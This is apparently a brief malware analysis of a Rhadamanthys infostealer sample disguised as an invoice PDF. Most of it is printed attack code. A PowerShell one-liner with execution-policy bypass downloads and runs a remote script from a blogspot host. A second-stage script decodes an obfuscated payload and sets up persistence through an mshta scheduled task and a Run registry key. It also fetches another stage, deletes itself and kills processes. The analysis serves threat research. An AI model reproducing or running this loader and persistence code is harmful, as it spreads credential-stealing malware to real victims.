SHA256: 67875f2e02e72156853367247edf3b891f026dd182c9d9aa4cce2aea842605ee
MD5: d5422e4c92dd87a04e6aca64ffa73e8b
filename: invoice-1619232149.pdf (40).js
file type: javascript
malware family: Rhadamanthys
Type: Infostealer
The initial js code spwans a power shell with command :
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (IrM <https://hotle25june.blogspot.com////phuda.pdf>); Start-Sleep -Seconds 9
Downloads the second stage payload/script called phuda.pdf from hotle25hune.blogspot.com.
a common evasion flag used by author is also used -ep Bypass with the connection over TLS 1.2 than executes it using Invoke-Expression, later waits for the script to execute by waiting 9 seconds.
phuda.pdf
$cmd = [) -join ''
$scriptBlock = [scriptblock]::Create($cmd)
& $scriptBlock
@("RegSvcs", "mshta", "wscript", "msbuild") | ForEach-Object {
Get-Process -Name $_ -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "Stopped process: $_"
}
Remove-Item "$env:USERPROFILE\\Downloads\\*.js" -Force
function Convert-DecimalToText {
param ([string]$DecimalString)
try {
($DecimalString -split '[,\\s]+' | Where-Object { $_ -match '^\\d+$' } | ForEach-Object { [char][int]$_ }) -join ''
} catch {
"Error: $_"
}
}
function Get-RandomCharacters {
$customCharacters = "abcdefghijklmnopqrstuvwxyz"
-join ((0..2) | ForEach-Object { $customCharacters.Substring((Get-Random -Maximum $customCharacters.Length), 1) })
}
function Get-RandomNumber {
param ($min = 60, $max = 165)
return Get-Random -Minimum $min -Maximum ($max + 1)
}
$lundmureeeker = ""
decoded from above
#sheduler
@"
$NhdwiJFw = @"
"javascript:var def=[[String.fromCharCode(83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110)],'SHE'+'LLEX'+'EC'+'UTE','pow'+'er'+'sh'+'ell','-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (Irm lnkulund); Start-Sleep -Seconds 9','',String.fromCharCode(111,112,101,110),0],jkl=new ActiveXObject(def[0]);jkl[def[1]](def[2],def[3],def[4],def[5],def[6]);close();"
"@
$taskniminimi = "phuditaskhai"
$randomlundsalajeet = "00:30:00"; Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'mshta' -Argument $NhdwiJFw) -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).Date -RepetitionInterval (New-TimeSpan -Minutes phuditimmer) -RepetitionDuration (New-TimeSpan -Days 3650) -RandomDelay $randomlundsalajeet) -TaskName $taskniminimi -Force
Set-ItemProperty -Path "HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" -Name "phuditaskhai" -Value "schtasks /run /tn $taskniminimi" #
explaination below
"@
$phudmassmdow = Convert-DecimalToText -DecimalString $lundmureeeker
$fangooadwko = 'h' + 'tt' + 'ps' + ':/' + '/'
$chutmaransiwaka = $fangooadwko + 'hoteljunene' + '.blog' + 's' + 'p' + 'o' + 't.' + 'c' + 'om' + '/lun.pdf'
# <http://htoeljunene.blogspost.com.lun.pdf>
$dabaomazyurao0 = Get-RandomCharacters
$dabaomazyurao1 = Get-RandomCharacters
$dabaomazyurao2 = Get-RandomCharacters
$dabaomazyurao3 = Get-RandomCharacters
$dabaomazyurao4 = "bookinxgm" + (Get-RandomNumber)
$dabaomazyurao5 = "Ubookignkwvo" + (Get-RandomNumber)
$dabaomazyurao6 = Get-RandomNumber
$dabaomazyurao7 = Get-RandomCharacters
$dabaomazyurao8 = Get-RandomCharacters
$dabaomazyurao9 = Get-RandomCharacters
$phudmassmdow = $phudmassmdow.Replace('tskliuli', $dabaomazyurao5).Replace('lnkulund', $chutmaransiwaka).Replace('abc', $dabaomazyurao1).Replace('def', $dabaomazyurao2).Replace('phuditimmer', $dabaomazyurao6).Replace('phuditaskhai', $dabaomazyurao4).Replace('ghi', $dabaomazyurao3).Replace('jkl', $dabaomazyurao0)
$phudmassmdow | . Iex
$scriptPath = $MyInvocation.MyCommand.Path
# Check if the script path exists
if (Test-Path $scriptPath) {
# Try to delete the script
try {
Remove-Item -Path $scriptPath -Force
Write-Output "Script has been deleted successfully."
} catch {
Write-Error "Failed to delete the script. Error: $_"
}
} else {
Write-Error "Script path does not exist."
}
Start-Sleep -Seconds 22
# Get processes with .bat or powershell in their command lines and stop them forcefully
Get-Process | Where-Object { $_.MainModule.FileName -like '*\\*.bat' -or $_.MainModule.FileName -like '*\\powershell*' } | ForEach-Object { Stop-Process -Id $_.Id -Force }